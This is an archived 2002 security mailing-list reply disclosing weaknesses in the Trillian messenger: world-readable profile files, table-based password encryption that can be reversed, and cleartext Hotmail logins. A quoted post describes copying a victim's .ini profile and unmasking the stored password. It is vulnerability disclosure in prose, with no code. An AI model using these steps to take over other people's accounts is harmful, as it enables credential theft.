RE: Trillian Messaging Software

From: Ben Floyd (dataplex17at_private)
Date: Thu Jun 06 2002 - 13:11:55 PDT

  • Next message: KF: "Re: Hesiod security"

    >From: "Don Weber" <Donat_private>
    ...
    
    >we use it here primarily for the ability it provides in secure >messages 
    >over icq and one of the others it supports, as far as >security, it does i 
    >blv, store passwords and the like in the registry >and other text files, 
    >here's an old post i just found again related to >trillion. but I'd think 
    >personally, if someone can get to this, your >already in trouble
    
    I brought this up with the developer of trillian several months ago because 
    I did some testing of the client when it first came out.  I was informed 
    that security was only a temporary fix and that eventually everything is 
    broken, so it is not worth wasting development time on.  On machines with 
    multiple users (win2k, XP), trillian does not do any file protection (USERS 
    group is allowed read\execute access to the default directory).
    
    The encryption scheme used is very simple to crack.  It uses static tables 
    defined in the program to generate the passwords based on length. i.e., 
    passwords that are between 1-5 characters (if I remember correctly) use 1 
    table, 6-15 characters uses another, and anything over that uses a third 
    table.  To crack it, you can sipmly compare passwords of various lengths to 
    the previous password that was used, and in this manner recreate the table 
    used in under 20 minutes.
    
    Another issue that I found was that when accessing a hotmail account from 
    trillian, the password is passed to the server in cleartext.  If anyone 
    wants a users hotmail password, they only have to wait for the user to 
    access their account and run a browser cache recovery tool.
    
    After the hostile meeting with the developer I determined that Trillian was 
    not worth my time or the risk associated with using it.  If the local 
    security is that weak, I only wonder what the "encrypted chat" algorithms 
    look like.
    
    >Trillian has a system that creates .ini files for connecting to the
    >respective messenger services such as MSN,Yahoo,IRC,etc...which it >stores 
    >in the users' directory.For example-the settings of a >particular user are 
    >stored in his default user's directory.For >connecting to MSN there is a 
    >file called msn.ini.For Yahoo...there is >yahoo.ini.And so on...These files 
    >include the details of that user >such as his email id to connect to that 
    >service,his contact >list,display options,and all that stuff.
    >But one thing that seems particularly interesting is that...it stores
    >the password to the service in an elementary encrypted format.
    >Trillian does not forbid access to any user's .ini files in any manner.
    >That leaves a huge security hole in the whole system.Anybody can just copy
    >and paste the "Profile" of the person to his own msn.ini file and gain full
    >access to the victim's respective service.Also the masked password appears
    >in the connection manager field which can be easily unmasked using a
    >password revealer like Cain.Thus revealing the password of that person.So
    >all you need to do is just gain access to the victim's .ini files in the
    >Trillian>>Users>>Victim folder and the work is done.
    >The .ini file looks like this......
    >for example.....for msn service
    ...
    
    -dpx
    =======================
    http://www.dataplex.org
    Email: dpxat_private
    =======================
    
    
    _________________________________________________________________
    Send and receive Hotmail on your mobile device: http://mobile.msn.com
    



    This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 14:23:33 PDT